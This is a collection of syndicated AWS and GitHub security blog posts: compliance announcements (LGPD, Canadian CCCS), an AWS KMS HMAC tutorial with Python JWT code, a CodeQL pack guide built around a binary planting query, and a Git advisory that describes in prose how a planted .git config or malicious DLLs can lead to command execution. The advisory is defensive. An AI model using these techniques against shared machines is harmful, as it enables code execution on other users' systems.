A AWS tem o prazer de anunciar a publicação do Workbook Lei Geral de Proteção de Dados do Brasil.

A Lei Geral de Proteção de Dados (LGPD) teve sua primeira publicação em 14 de agosto de 2018 no Brasil e iniciou sua aplicabilidade em 18 de agosto de 2020. Empresas que gerenciam informações pessoais identificáveis (PII) conforme definido na LGPD terão que cumprir e atender às cláusulas da lei.

Para ajudar melhor os clientes a preparar e implementar controles que se concentram no Capítulo VII da LGPD “da Segurança e Boas Práticas”, a AWS criou uma pasta de trabalho com base nas melhores práticas do setor, ofertas de serviços e controles da AWS.

Entre outros tópicos, esta pasta de trabalho aborda a segurança da informação e os controles da AWS de:

Em combinação com o Workbook Lei Geral de Proteção de Dados do Brasil, os clientes podem usar o whitepaper detalhado Navegando na conformidade com a LGPD na AWS.

A AWS adere a um modelo de responsabilidade compartilhada. Clientes terão que observar quais serviços oferecem recursos de privacidade e determinar sua aplicabilidade aos seus requisitos específicos de compliance. Mais informações sobre a privacidade de dados na AWS podem ser encontradas em nosso Centro de Privacidade de Dados. Informações adicionais sobre LGPD e Privacidade de dados na AWS no Brasil podem ser encontradas em nossa página de Privacidade de Dados no Brasil.

Para saber mais sobre nossos programas de conformidade e segurança, consulte Programas de conformidade da AWS. Como sempre, valorizamos seus comentários e perguntas; entre em contato com a equipe de conformidade da AWS por meio da página Fale conosco.

Se você tiver feedback sobre esta postagem, envie comentários na seção Comentários abaixo.

Quer mais notícias sobre segurança da AWS? Siga-nos no Twitter.

Rodrigo Fiuza

Rodrigo is a Security Audit Manager at AWS, based in São Paulo. He leads audits, attestations, certifications, and assessments across Latin America, the Caribbean, and Europe. Rodrigo has worked in risk management, security assurance, and technology audits for the past 12 years.

Canadian Centre for Cyber Security Assessment Summary report now available in AWS Artifact

Post Syndicated from Rob Samuel original https://aws.amazon.com/blogs/security/canadian-centre-for-cyber-security-assessment-summary-report-now-available-in-aws-artifact/

French version

At Amazon Web Services (AWS), we are committed to providing continued assurance to our customers through assessments, certifications, and attestations that support the adoption of AWS services. We are pleased to announce the availability of the Canadian Centre for Cyber Security (CCCS) assessment summary report for AWS, which you can view and download on demand through AWS Artifact.

The CCCS is Canada’s authoritative source of cyber security expert guidance for the Canadian government, industry, and the general public. Public and commercial sector organizations across Canada rely on CCCS’s rigorous Cloud Service Provider (CSP) IT Security (ITS) assessment in their decision to use CSP services. In addition, CCCS’s ITS assessment process is a mandatory requirement for AWS to provide cloud services to Canadian federal government departments and agencies.

The CCCS Cloud Service Provider Information Technology Security Assessment Process determines whether the Government of Canada (GC) ITS requirements for the CCCS Medium Cloud Security Profile (previously referred to as GC’s PROTECTED B/Medium Integrity/Medium Availability [PBMM] profile) are met, as described in ITSG-33 (IT Security Risk Management: A Lifecycle Approach, Annex 3 – Security Control Catalogue). As of September 2021, 120 AWS services in the Canada (Central) Region have been assessed by the CCCS and meet the requirements for the medium cloud security profile. Meeting the medium cloud security profile is required to host workloads that are classified up to and including the medium categorization. On a periodic basis, CCCS assesses new or previously unassessed services and re-assesses the AWS services that were previously assessed to verify that they continue to meet the GC’s requirements. CCCS prioritizes the assessment of new AWS services based on their availability in Canada and customer demand for the AWS services. The full list of AWS services that have been assessed by CCCS is available on our Services in Scope by Compliance Program page.

To learn more about the CCCS assessment or our other compliance and security programs, visit AWS Compliance Programs. If you have questions about this blog post, please start a new thread on the AWS Artifact forum or contact AWS Support.

If you have feedback about this post, submit comments in the Comments section below. Want more AWS Security news? Follow us on Twitter.

Rob Samuel

Rob Samuel is a Principal technical leader for AWS Security Assurance. He partners with teams across AWS to translate data protection principles into technical requirements, aligns technical direction and priorities, orchestrates new technical solutions, helps integrate security and privacy solutions into AWS services and features, and addresses cross-cutting security and privacy requirements and expectations. Rob has more than 20 years of experience in the technology industry, and has previously held leadership roles, including Head of Security Assurance for AWS Canada, Chief Information Security Officer (CISO) for the Province of Nova Scotia, various security leadership roles as a public servant, and served as a Communications and Electronics Engineering Officer in the Canadian Armed Forces.

Naranjan Goklani

Naranjan Goklani is a Security Audit Manager at AWS, based in Toronto (Canada). He leads audits, attestations, certifications, and assessments across North America and Europe. Naranjan has more than 12 years of experience in risk management, security assurance, and performing technology audits. Naranjan previously worked in one of the Big 4 accounting firms and supported clients from the retail, ecommerce, and utilities industries.

Brian Mycroft

Brian Mycroft is a Chief Technologist at AWS, based in Ottawa (Canada), specializing in national security, intelligence, and the Canadian federal government. Brian is the lead architect of the AWS Secure Environment Accelerator (ASEA) and focuses on removing public sector barriers to cloud adoption.


Rapport sommaire de l’évaluation du Centre canadien pour la cybersécurité disponible sur AWS Artifact

Par Robert Samuel, Naranjan Goklani et Brian Mycroft
Amazon Web Services (AWS) s’engage à fournir à ses clients une assurance continue à travers des évaluations, des certifications et des attestations qui appuient l’adoption des services proposés par AWS. Nous avons le plaisir d’annoncer la mise à disposition du rapport sommaire de l’évaluation du Centre canadien pour la cybersécurité (CCCS) pour AWS, que vous pouvez dès à présent consulter et télécharger à la demande sur AWS Artifact.

Le CCC est l’autorité canadienne qui met son expertise en matière de cybersécurité au service du gouvernement canadien, du secteur privé et du grand public. Les organisations des secteurs public et privé établies au Canada dépendent de la rigoureuse évaluation de la sécurité des technologies de l’information s’appliquant aux fournisseurs de services infonuagiques conduite par le CCC pour leur décision relative à l’utilisation de ces services infonuagiques. De plus, le processus d’évaluation de la sécurité des technologies de l’information est une étape obligatoire pour permettre à AWS de fournir des services infonuagiques aux agences et aux ministères du gouvernement fédéral canadien.

Le Processus d’évaluation de la sécurité des technologies de l’information s’appliquant aux fournisseurs de services infonuagiques détermine si les exigences en matière de technologie de l’information du Gouvernement du Canada (GC) pour le profil de contrôle de la sécurité infonuagique moyen (précédemment connu sous le nom de Protégé B/Intégrité moyenne/Disponibilité moyenne) sont satisfaites conformément à l’ITSG-33 (Gestion des risques liés à la sécurité des TI : Une méthode axée sur le cycle de vie, Annexe 3 – Catalogue des contrôles de sécurité). En date de septembre 2021, 120 services AWS de la région (centrale) du Canada ont été évalués par le CCC et satisfont aux exigences du profil de sécurité moyen du nuage. Satisfaire les exigences du niveau moyen du nuage est nécessaire pour héberger des applications classées jusqu’à la catégorie moyenne incluse. Le CCC évalue périodiquement les nouveaux services, ou les services qui n’ont pas encore été évalués, et réévalue les services AWS précédemment évalués pour s’assurer qu’ils continuent de satisfaire aux exigences du Gouvernement du Canada. Le CCC priorise l’évaluation des nouveaux services AWS selon leur disponibilité au Canada et en fonction de la demande des clients pour les services AWS. La liste complète des services AWS évalués par le CCC est consultable sur notre page Services AWS concernés par le programme de conformité.

Pour en savoir plus sur l’évaluation du CCC ainsi que sur nos autres programmes de conformité et de sécurité, visitez la page Programmes de conformité AWS. Comme toujours, nous accordons beaucoup de valeur à vos commentaires et à vos questions; vous pouvez communiquer avec l’équipe Conformité AWS via la page Communiquer avec nous.

Si vous avez des commentaires sur cette publication, n’hésitez pas à les partager dans la section Commentaires ci-dessous. Vous souhaitez en savoir plus sur AWS Security? Retrouvez-nous sur Twitter.

Biographies des auteurs :

Rob Samuel : Rob Samuel est responsable technique principal d’AWS Security Assurance. Il collabore avec les équipes AWS pour traduire les principes de protection des données en recommandations techniques, aligne la direction technique et les priorités, met en œuvre les nouvelles solutions techniques, aide à intégrer les solutions de sécurité et de confidentialité aux services et fonctionnalités proposés par AWS et répond aux exigences et aux attentes en matière de confidentialité et de sécurité transversale. Rob a plus de 20 ans d’expérience dans le secteur de la technologie et a déjà occupé des fonctions dirigeantes, comme directeur de l’assurance sécurité pour AWS Canada, responsable de la cybersécurité et des systèmes d’information (RSSI) pour la province de la Nouvelle-Écosse, divers postes à responsabilités en tant que fonctionnaire et a servi dans les Forces armées canadiennes en tant qu’officier du génie électronique et des communications.

Naranjan Goklani : Naranjan Goklani est responsable des audits de sécurité pour AWS, il est basé à Toronto (Canada). Il est responsable des audits, des attestations, des certifications et des évaluations pour l’Amérique du Nord et l’Europe. Naranjan a plus de 12 ans d’expérience dans la gestion des risques, l’assurance de la sécurité et la réalisation d’audits de technologie. Naranjan a exercé dans l’une des quatre plus grandes sociétés de comptabilité et accompagné des clients des industries de la distribution, du commerce en ligne et des services publics.

Brian Mycroft : Brian Mycroft est technologue en chef pour AWS, il est basé à Ottawa (Canada) et se spécialise dans la sécurité nationale, le renseignement et le gouvernement fédéral du Canada. Brian est l’architecte principal de l’AWS Secure Environment Accelerator (ASEA) et s’intéresse principalement à la suppression des barrières à l’adoption du nuage pour le secteur public.

How to protect HMACs inside AWS KMS

Post Syndicated from Jeremy Stieglitz original https://aws.amazon.com/blogs/security/how-to-protect-hmacs-inside-aws-kms/

Today AWS Key Management Service (AWS KMS) is introducing new APIs to generate and verify hash-based message authentication codes (HMACs) using the Federal Information Processing Standard (FIPS) 140-2 validated hardware security modules (HSMs) in AWS KMS. HMACs are a powerful cryptographic building block that incorporate secret key material in a hash function to create a unique, keyed message authentication code.

In this post, you will learn the basics of the HMAC algorithm as a cryptographic building block, including how HMACs are used. In the second part of this post, you will see a few real-world use cases that show an application builder’s perspective on using the AWS KMS HMAC APIs.

HMACs provide a fast way to tokenize or sign data such as web API requests, credit cards, bank routing information, or personally identifiable information (PII). They are commonly used in several internet standards and communication protocols such as JSON Web Tokens (JWT), and are even an important security component of how you sign AWS API requests.

HMAC as a cryptographic building block

You can consider an HMAC, sometimes referred to as a keyed hash, to be a combination function that fuses the following elements:

  • A standard hash function such as SHA-256 to produce a message authentication code (MAC).
  • A secret key that binds this MAC to that key’s unique value.

Combining these two elements creates a unique, authenticated version of the digest of a message. Because the HMAC construction allows interchangeable hash functions as well as different secret key sizes, one of the benefits of HMACs is the easy replaceability of the underlying hash function (in case faster or more secure hash functions are required), as well as the ability to add more security by lengthening the size of the secret key used in the HMAC over time. The AWS KMS HMAC API is launching with support for SHA-224, SHA-256, SHA-384, and SHA-512 algorithms to provide a good balance of key sizes and performance trade-offs in the implementation. For more information about HMAC algorithms supported by AWS KMS, see HMAC keys in AWS KMS in the AWS KMS Developer Guide.
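
As a purely local illustration of the construction (not the AWS KMS API, which is covered later in this post), the short Python sketch below computes and verifies an HMAC with the standard library and shows that swapping the underlying hash function is a one-argument change; the key and message are placeholders:

import hashlib
import hmac

secret_key = b"an-example-secret-key"  # illustrative only; never hardcode real keys
message = b"The quick brown fox jumps over the lazy dog"

# HMAC-SHA-256 of the message under the secret key
tag_sha256 = hmac.new(secret_key, message, hashlib.sha256).hexdigest()

# Swapping the underlying hash function is a one-argument change
tag_sha512 = hmac.new(secret_key, message, hashlib.sha512).hexdigest()

# Verification recomputes the tag and compares it in constant time
assert hmac.compare_digest(
    tag_sha256,
    hmac.new(secret_key, message, hashlib.sha256).hexdigest(),
)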

HMACs offer two distinct benefits:

  1. Message integrity: As with all hash functions, the output of an HMAC will result in precisely one unique digest of the message’s content. If there is any change to the data object (for example you modify the purchase price in a contract by just one digit: from “$350,000” to “$950,000”), then the verification of the original digest will fail.
  2. Message authenticity: What distinguishes HMAC from other hash methods is the use of a secret key to provide message authenticity. Only message hashes that were created with the specific secret key material will produce the same HMAC output. This dependence on secret key material ensures that no third party can substitute their own message content and create a valid HMAC without the intended verifier detecting the change.

HMAC in the real world

HMACs have widespread applications and industry adoption because they are fast, high performance, and simple to use. HMACs are particularly popular in the JSON Web Token (JWT) open standard as a means of securing web applications, and have replaced older technologies such as cookies and sessions. In fact, Amazon implements a custom authentication scheme, Signature Version 4 (SigV4), to sign AWS API requests based on a keyed-HMAC. To authenticate a request, you first concatenate selected elements of the request to form a string. You then use your AWS secret key material to calculate the HMAC of that string. Informally, this process is called signing the request, and the output of the HMAC algorithm is informally known as the signature, because it simulates the security properties of a real signature in that it represents your identity and your intent.
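
As an illustrative sketch of what that signing step involves, the snippet below reproduces the documented SigV4 signing-key derivation, a chain of HMAC-SHA-256 operations over the date, region, and service. The secret key, date, and string to sign are truncated placeholders rather than real values:

import hashlib
import hmac

def hmac_sha256(key, msg):
    return hmac.new(key, msg.encode("utf-8"), hashlib.sha256).digest()

def sigv4_signing_key(secret_key, date, region, service):
    # Derive the SigV4 signing key through a chain of HMAC-SHA-256 operations
    k_date = hmac_sha256(("AWS4" + secret_key).encode("utf-8"), date)
    k_region = hmac_sha256(k_date, region)
    k_service = hmac_sha256(k_region, service)
    return hmac_sha256(k_service, "aws4_request")

# Placeholder inputs; a real request also needs the canonical request and
# string to sign described in the SigV4 documentation
signing_key = sigv4_signing_key("wJalr...EXAMPLEKEY", "20220419", "us-east-1", "s3")
string_to_sign = "AWS4-HMAC-SHA256\n..."  # truncated placeholder
signature = hmac.new(signing_key, string_to_sign.encode("utf-8"), hashlib.sha256).hexdigest()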

Advantages of using HMACs in AWS KMS

AWS KMS HMAC APIs provide several advantages over implementing HMACs in application software because the key material for the HMACs is generated in AWS KMS hardware security modules (HSMs) that are certified under the FIPS 140-2 program and never leave AWS KMS unencrypted. In addition, the HMAC keys in AWS KMS can be managed with the same access control mechanisms and auditing features that AWS KMS provides on all AWS KMS keys. These security controls ensure that any HMAC created in AWS KMS can only ever be verified in AWS KMS using the same KMS key. Lastly, the HMAC keys and the HMAC algorithms that AWS KMS uses conform to industry standards defined in RFC 2104 HMAC: Keyed-Hashing for Message Authentication.

Use HMAC keys in AWS KMS to create JSON Web Tokens

The JSON Web Token (JWT) open standard is a common use of HMAC. The standard defines a portable and secure means to communicate a set of statements, known as claims, between parties. HMAC is useful for applications that need an authorization mechanism, in which claims are validated to determine whether an identity has permission to perform some action. Such an application can only work if a validator can trust the integrity of claims in a JWT. Signing JWTs with an HMAC is one way to assert their integrity. Verifiers with access to an HMAC key can cryptographically assert that the claims and signature of a JWT were produced by an issuer using the same key.

This section will walk you through an example of how you can use HMAC keys from AWS KMS to sign JWTs. The example uses the AWS SDK for Python (Boto3) and implements simple JWT encoding and decoding operations. This example shows the ease with which you can integrate HMAC keys in AWS KMS into your JWT application, even if your application is in another language or uses a more formal JWT library.

Create an HMAC key in AWS KMS

Begin by creating an HMAC key in AWS KMS. You can use the AWS KMS console or call the CreateKey API action. The following example shows creation of a 256-bit HMAC key:

import boto3

kms = boto3.client('kms')

# Use CreateKey API to create a 256-bit key for HMAC
key_id = kms.create_key(
	KeySpec='HMAC_256',
	KeyUsage='GENERATE_VERIFY_MAC'
)['KeyMetadata']['KeyId']

Use the HMAC key to encode a signed JWT

Next, you use the HMAC key to encode a signed JWT. There are three components to a JWT token: the set of claims, the header, and the signature. The claims are the application-specific statements to be authenticated. The header describes how the JWT is signed. Lastly, the MAC (signature) is the output of applying the operation described in the header to the message (the combination of the claims and header). All of these are packed into a URL-safe string according to the JWT standard.

The following example uses the previously created HMAC key in AWS KMS within the construction of a JWT. The example’s claims simply consist of a small claim and an issuance timestamp. The header contains the key ID of the HMAC key and the name of the HMAC algorithm used. Note that HS256 is the JWT convention used to represent HMAC with a SHA-256 digest. You can generate the MAC using the new GenerateMac API action in AWS KMS.

import base64
import json
import time

def base64_url_encode(data):
	return base64.b64encode(data, b'-_').rstrip(b'=')

# Payload contains simple claim and an issuance timestamp
payload = json.dumps({
	"does_kms_support_hmac": "yes",
	"iat": int(time.time())
}).encode("utf8")

# Header describes the algorithm and AWS KMS key ID to be used for signing
header = json.dumps({
	"typ": "JWT",
	"alg": "HS256",
	"kid": key_id #This key_id is from the “Create an HMAC key in AWS KMS” #example. The “Verify the signed JWT” example will later #assert that the input header has the same value of the #key_id 
}).encode("utf8")

# Message to sign is of form <header_b64>.<payload_b64>
message = base64_url_encode(header) + b'.' + base64_url_encode(payload)

# Generate MAC using GenerateMac API of AWS KMS
mac = kms.generate_mac(
	KeyId=key_id,  # key_id from the "Create an HMAC key in AWS KMS" example
	MacAlgorithm='HMAC_SHA_256',
	Message=message
)['Mac']

# Form JWT token of form <header_b64>.<payload_b64>.<mac_b64>
jwt_token = message + b'.' + base64_url_encode(mac)

Verify the signed JWT

Now that you have a signed JWT, you can verify it using the same KMS HMAC key. The example below uses the new VerifyMac API action to validate the MAC (signature) of the JWT. If the MAC is invalid, AWS KMS returns an error response and the AWS SDK throws an exception. If the MAC is valid, the request succeeds and the application can continue to do further processing on the token and its claims.

def base64_url_decode(data):
	# Re-add only the padding needed to make the length a multiple of 4
	return base64.b64decode(data + b'=' * (-len(data) % 4), b'-_')

# Parse out encoded header, payload, and MAC from the token
message, mac_b64 = jwt_token.rsplit(b'.', 1)
header_b64, payload_b64 = message.rsplit(b'.', 1)

# Decode header and verify its contents match expectations
header_map = json.loads(base64_url_decode(header_b64).decode("utf8"))
assert header_map == {
	"typ": "JWT",
	"alg": "HS256",
	"kid": key_id #This key_id is from the “Create an HMAC key in AWS KMS” 
				 #example
}

# Verify the MAC using the VerifyMac API of AWS KMS.
# If the verification fails, this call throws an error.
kms.verify_mac(
	KeyId=key_id,  # key_id from the "Create an HMAC key in AWS KMS" example
	MacAlgorithm='HMAC_SHA_256',
	Message=message,
	Mac=base64_url_decode(mac_b64)
)

# Decode payload for application-specific validation/processing
payload_map = json.loads(base64_url_decode(payload_b64).decode("utf8"))

Create separate roles to control who has access to generate HMACs and who has access to validate HMACs

It’s often helpful to have separate JWT creators and validators so that you can distinguish between the roles that are allowed to create tokens and the roles that are allowed to verify tokens. HMAC signatures performed outside of AWS-KMS don’t work well for this because you can’t isolate creators and verifiers if they both must have a copy of the same key. However, this is not an issue for HMAC keys in AWS KMS. You can use key policies to separate out who has permission to ask AWS KMS to generate HMACs and who has permission to ask AWS KMS to validate. Each party uses their own unique access keys to access the HMAC key in AWS KMS. Only HSMs in AWS KMS will ever have access to the actual key material. See the following example key policy statements that separate out GenerateMac and VerifyMac permissions:

{
	"Id": "example-jwt-policy",
	"Version": "2012-10-17",
	"Statement": [
		{
			"Sid": "Allow use of the key for creating JWTs",
			"Effect": "Allow",
			"Principal": {
				"AWS": "arn:aws:iam::111122223333:role/JwtProducer"
			},
			"Action": [
				"kms:GenerateMac"
			],
			"Resource": "*"
		},
		{
			"Sid": "Allow use of the key for validating JWTs",
			"Effect": "Allow",
			"Principal": {
				"AWS": "arn:aws:iam::111122223333:role/JwtConsumer"
			},
			"Action": [
				"kms:VerifyMac"
			],
			"Resource": "*"
		}
	]
}

Conclusion

In this post, you learned about the new HMAC APIs in AWS KMS (GenerateMac and VerifyMac). These APIs complement existing AWS KMS cryptographic operations: symmetric key encryption, asymmetric key encryption and signing, and data key creation and key enveloping. You can use HMACs for JWTs, tokenization, URL and API signing, as a key derivation function (KDF), as well as in new designs that we haven’t even thought of yet. To learn more about HMAC functionality and design, see HMAC keys in AWS KMS in the AWS KMS Developer Guide.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the KMS re:Post or contact AWS Support.
Want more AWS Security news? Follow us on Twitter.

Jeremy Stieglitz

Jeremy is the Principal Product Manager for AWS Key Management Service (KMS) where he drives global product strategy and roadmap for AWS KMS. Jeremy has more than 20 years of experience defining new products and platforms, launching and scaling cryptography solutions, and driving end-to-end product strategies. Jeremy is the author or co-author of 23 patents in network security, user authentication and network automation and control.

Peter Zieske

Peter is a Senior Software Developer on the AWS Key Management Service team, where he works on developing features on the service-side front-end. Outside of work, he enjoys building with LEGO, gaming, and spending time with family.

Sharing security expertise through CodeQL packs (Part I)

Post Syndicated from Andrew Eisenberg original https://github.blog/2022-04-19-sharing-security-expertise-through-codeql-packs-part-i/

Congratulations! You’ve discovered a security bug in your own code before anyone has exploited it. It’s a big relief. You’ve created a CodeQL query to find other places where this happens and ensure this will never happen again, and you’ve deployed your new query to be run on every pull request in your repo to prevent similar mistakes from ever being made again.

What’s the best way to share this knowledge with the community to help protect the open source ecosystem by making sure that the same vulnerability is never introduced into anyone’s codebase, ever?

The short answer: produce a CodeQL pack containing your queries, and publish them to GitHub. CodeQL packaging is a beta feature in the CodeQL ecosystem. With CodeQL packaging, your expertise is documented, concise, executable, and easily shareable.

This is the first post of a two-part series on CodeQL packaging. In this post, we show how to use CodeQL packs to share security expertise. In the next post, we will discuss some of our implementation and design decisions.

Modeling a vulnerability in CodeQL

CodeQL’s customizability makes it great for detecting vulnerabilities in your code. Let’s use the Exec call vulnerable to binary planting query as an example. This query was developed by our team in response to discovering a real vulnerability in one of our open source repositories.

The purpose of this query is to detect executables that are potentially vulnerable to Windows binary planting, an exploit where an attacker could inject a malicious executable into a pull request. This query is meant to be evaluated on JavaScript code that is run inside of a GitHub Action. It matches all arguments to calls to the ToolRunner (a GitHub Action API) where the argument has not been sanitized (that is, ensured to be safe) by having been wrapped in a call to safeWhich. The implementation details of this query are not relevant to this post, but you can explore this query and other domain-specific queries like it in the repository.

This query is currently protecting us on every pull request, but in its current form, it is not easily available for others to use. Even though this vulnerability is relatively difficult to attack, the surface area is large, and it could affect any GitHub Action running on Windows in public repositories that accept pull requests. You could write a stern blog post on the dangers of invoking unqualified Windows executables in untrusted pull requests (maybe you’re even reading such a post right now!), but your impact will be much higher if you could share the query to help anyone find the bug in their code. This is where CodeQL packaging comes in. Using CodeQL packaging, not only can developers easily learn about the binary planting pattern, but they can also automatically apply the pattern to find the bug in their own code.

Sharing queries through CodeQL packs

If you think that your query is general purpose and applicable to all repositories in all situations, then it is best to contribute it to our open source CodeQL query repository (and collect a bounty in the process!). That way, your query will be run on every pull request on every repository that has GitHub code scanning enabled.

However, many (if not most) queries are domain specific and not applicable to all repositories. For example, this particular binary planting query is only applicable to GitHub Actions implemented in JavaScript. The best way to share such queries is by creating a CodeQL pack and publishing it to the CodeQL package registry to make it available to the world. Once published, CodeQL packs are easily shared with others and executed in their CI/CD pipelines.

There are two kinds of CodeQL packs:

  • Query packs, which contain a set of pre-compiled queries that can be easily evaluated on a CodeQL database.
  • Library packs, which contain CodeQL libraries (*.qll files), but do not contain any runnable queries. Library packs are meant to be used as building blocks to produce other query packs or library packs.

In the rest of this post, we will show you how to create, share, and consume a CodeQL query pack. Library packs will be introduced in a future blog post.

To create a CodeQL pack, you’ll need to make sure that you’ve installed and set up the CodeQL CLI. You can follow the instructions here.

The next step is to create a qlpack.yml file. This file declares the CodeQL pack and information about it. Any *.ql files in the same directory (or sub-directory) as a qlpack.yml file are considered part of the package. In this case, you can place binary-planting.ql next to the qlpack.yml file.

Here is the qlpack.yml from our example:

name: aeisenberg/codeql-actions-queries
version: 1.0.1
dependencies:
 codeql/javascript-all: ~0.0.10

All CodeQL packs must have a name property. If they are going to be published to the CodeQL registry, then they must have a scope as part of the name. The scope is the part of the package name before the slash (in this example: aeisenberg). It should be the username or organization on github.com that will own this package. Anyone publishing a package must have the proper privileges to do so for that scope. The name part of the package name must be unique within the scope. Additionally, a version, following standard semver rules, is required for publishing.

The dependencies block lists all of the dependencies of this package and their compatible version ranges. Each dependency is referenced as the scope/name of a CodeQL library pack, and each library pack may in turn depend on other library packs declared in their qlpack.yml files. Each query pack must (transitively) depend on exactly one of the core language packs (for example, JavaScript, C#, Ruby, etc.), which determines the language your query can analyze.

In this query pack, the standard JavaScript library pack, codeql/javascript-all, is the only dependency, and the semver range ~0.0.10 means that any version >= 0.0.10 and < 0.1.0 suffices.

With the qlpack.yml defined, you can now install all of your declared dependencies. Run the codeql pack install command in the root directory of the CodeQL pack:

$ codeql pack install
Dependencies resolved. Installing packages...
Install location: /Users/andrew.eisenberg/.codeql/packages
Installed fresh codeql/javascript-all@0.0.10

After making any changes to the query, you can then publish the query to the GitHub registry. You do this by running the codeql pack publish command in the root of the CodeQL pack.

Here is the output of the command:

$ codeql pack publish
Running on packs: aeisenberg/codeql-actions-queries.
Bundling and then publishing qlpack located at '/Users/andrew.eisenberg/git-repos/codeql-actions-queries'.
Bundled qlpack created at '/var/folders/41/kxmfbgxj40dd2l_x63x9fw7c0000gn/T/codeql-docker17755193287422157173/.Docker Package Manager/codeql-actions-queries.1.0.1.tgz'.
Packaging> Package 'aeisenberg/codeql-actions-queries' will be published to registry 'https://ghcr.io/v2/' as 'aeisenberg/codeql-actions-queries'.
Packaging> Package 'aeisenberg/codeql-actions-queries@1.0.1' will be published locally to /Users/andrew.eisenberg/.codeql/packages/aeisenberg/codeql-actions-queries/1.0.1
Publish successful.

You have successfully published your first CodeQL pack! It is now available in the registry on GitHub.com for anyone else to run using the CodeQL CLI. You can view your newly-published package on github.com:

CodeQL pack on github.com

At the time of this writing, packages are initially uploaded as private packages. If you want to make a package public, you must explicitly change its permissions. To do this, go to the package page, click on package settings, then scroll down to the Danger Zone:

Danger Zone!

And click Change visibility.

Running queries from CodeQL packs using the CodeQL CLI

Running the queries in a CodeQL pack is simple using the CodeQL CLI. If you already have a database created, just call the codeql database analyze command with the --download option, passing a reference to the package you want to use in your analysis:

$ codeql database analyze --format=sarif-latest --output=out.sarif --download my-db aeisenberg/codeql-actions-queries@^1.0.1

The --download option asks CodeQL to download any CodeQL packs that aren’t already available. The ^1.0.1 is optional and specifies that you want to run the latest version of the package that is compatible with 1.0.1. If no version range is specified, then the latest version is always used. You can also pass a list of packages to evaluate. The CodeQL CLI will download and cache each specified package and then run all queries in their default query suite.

To run a subset of queries in a pack, add a : and a path after it:

aeisenberg/codeql-actions-queries@^1.0.1:binary-planting.ql

Everything after the : is interpreted as a path relative to the root of the pack, and you can specify a single query, a query directory, or a query suite (.qls file).
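Putting the two together, a command like the following sketch (the database name and output file are placeholders) evaluates only the binary planting query from the pack:

$ codeql database analyze --format=sarif-latest --output=out.sarif --download my-db aeisenberg/codeql-actions-queries@^1.0.1:binary-planting.ql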

Evaluating CodeQL packs from code scanning

Running the queries from your CodeQL pack in GitHub code scanning is easy! In your code scanning workflow, in the github/codeql-action/init step, add a packs entry to list the packs you want to run:

- uses: github/codeql-action/init@v2
  with:
    packs:
      - aeisenberg/codeql-actions-queries@1.0.1
    languages: javascript

Note that specifying a path after a colon is not yet supported in the codeql-action, so with this approach you can only run the default query suite of a pack.

Conclusion

We’ve shown how easy it is to share your CodeQL queries with the world using two CLI commands: the first resolves and retrieves your dependencies and the second compiles, bundles, and publishes your package.

To recap:

Publishing a CodeQL query pack consists of:

  1. Create the qlpack.yml file.
  2. Run codeql pack install to download dependencies.
  3. Write and test your queries.
  4. Run codeql pack publish to share your package in GHCR.

Using a CodeQL query pack from GHCR on the command line consists of:

  1. codeql database analyze --download path/to/my-db aeisenberg/codeql-actions-queries@^1.0.1

Using a CodeQL query pack from GHCR in code-scanning consists of:

  1. Adding a config-file input to the github/codeql-action/init action
  2. Adding a packs block in the config file

The CodeQL Team has already published all of our standard queries as query packs, and all of our core libraries as library packs. Any pack named {*}-queries is a query pack and contains queries that can be used to scan your code. Any pack named {*}-all is a library pack and contains CodeQL libraries (*.qll files) that can be used as the building blocks for your queries. When you are creating your own query packs, you should be adding as a dependency the library pack for the language that your query will scan.
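For example, a minimal sketch of declaring that dependency for a hypothetical Java query pack; recent versions of the CodeQL CLI provide a codeql pack add command for this (you can also add the entry to the dependencies block of qlpack.yml by hand):

$ codeql pack add codeql/java-all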

If you are interested in understanding more about how we’ve implemented packaging and some of our design decisions, please check out our second post in this series. Also, if you are interested in learning more or contributing to CodeQL, get involved with the Security Lab.

Sharing your security expertise has never been easier!

Git security vulnerability announced

Post Syndicated from Taylor Blau original https://github.blog/2022-04-12-git-security-vulnerability-announced/

Today, the Git project released new versions which address a pair of security vulnerabilities.

GitHub is unaffected by these vulnerabilities¹. However, you should be aware of them and upgrade your local installation of Git, especially if you are using Git for Windows, or you use Git on a multi-user machine.

CVE-2022-24765

This vulnerability affects users working on multi-user machines where a malicious actor could create a .git directory in a shared location above a victim’s current working directory. On Windows, for example, an attacker could create C:\.git\config, which would cause all git invocations that occur outside of a repository to read its configured values.

Since some configuration variables (such as core.fsmonitor) cause Git to execute arbitrary commands, this can lead to arbitrary command
execution when working on a shared machine.

The most effective way to protect against this vulnerability is to upgrade to Git v2.35.2. This version changes Git’s behavior when looking for a top-level .git directory to stop when its directory traversal changes ownership from the current user. (If you wish to make an exception to this behavior, you can use the new multi-valued safe.directory configuration).
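If you need to keep working in a specific shared repository that you trust, a minimal example of adding such an exception (the path is a placeholder):

git config --global --add safe.directory /path/to/shared/repository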

If you can’t upgrade immediately, the most effective ways to reduce your risk are the following:

  • Define the GIT_CEILING_DIRECTORIES environment variable to contain the parent directory of your user profile (i.e., /Users on macOS, /home on Linux, and C:\Users on Windows); see the example after this list.
  • Avoid running Git on multi-user machines when your current working directory is not within a trusted repository.
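For example, on Linux the first mitigation could be applied by exporting the variable in your shell profile (use /Users on macOS or C:\Users on Windows instead):

export GIT_CEILING_DIRECTORIES=/home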

Note that many tools (such as the Git for Windows installation of Git Bash, posh-git, and Visual Studio) run Git commands under the hood. If you are on a multi-user machine, avoid using these tools until you have upgraded to the latest release.

Credit for finding this vulnerability goes to 俞晨东.

[source]

CVE-2022-24767

This vulnerability affects the Git for Windows uninstaller, which runs in the user’s temporary directory. Because the SYSTEM user account inherits the default permissions of C:\Windows\Temp (which is world-writable), any authenticated user can place malicious .dll files there, and these are loaded when the Git for Windows uninstaller is run via the SYSTEM account.

The most effective way to protect against this vulnerability is to upgrade to Git for Windows v2.35.2. If you can’t upgrade
immediately, reduce your risk with the following:

  • Avoid running the uninstaller until after upgrading
  • Override the SYSTEM user’s TMP environment variable to a directory which can only be written to by the SYSTEM user
  • Remove unknown .dll files from C:\Windows\Temp before running the
    uninstaller
  • Run the uninstaller under an administrator account rather than as the
    SYSTEM user

Credit for finding this vulnerability goes to the Lockheed Martin Red Team.

[source]

Download Git 2.35.2


  1. GitHub does not run git outside of known repositories, so is not susceptible to the attack described by CVE-2022-24765. Likewise, GitHub does not use Git for Windows, and so is unaffected by CVE-2022-24767 entirely. 

Git Credential Manager: authentication for everyone

Post Syndicated from Matthew John Cheetham original https://github.blog/2022-04-07-git-credential-manager-authentication-for-everyone/

Universal Git Authentication

“Authentication is hard. Hard to debug, hard to test, hard to get right.” – Me

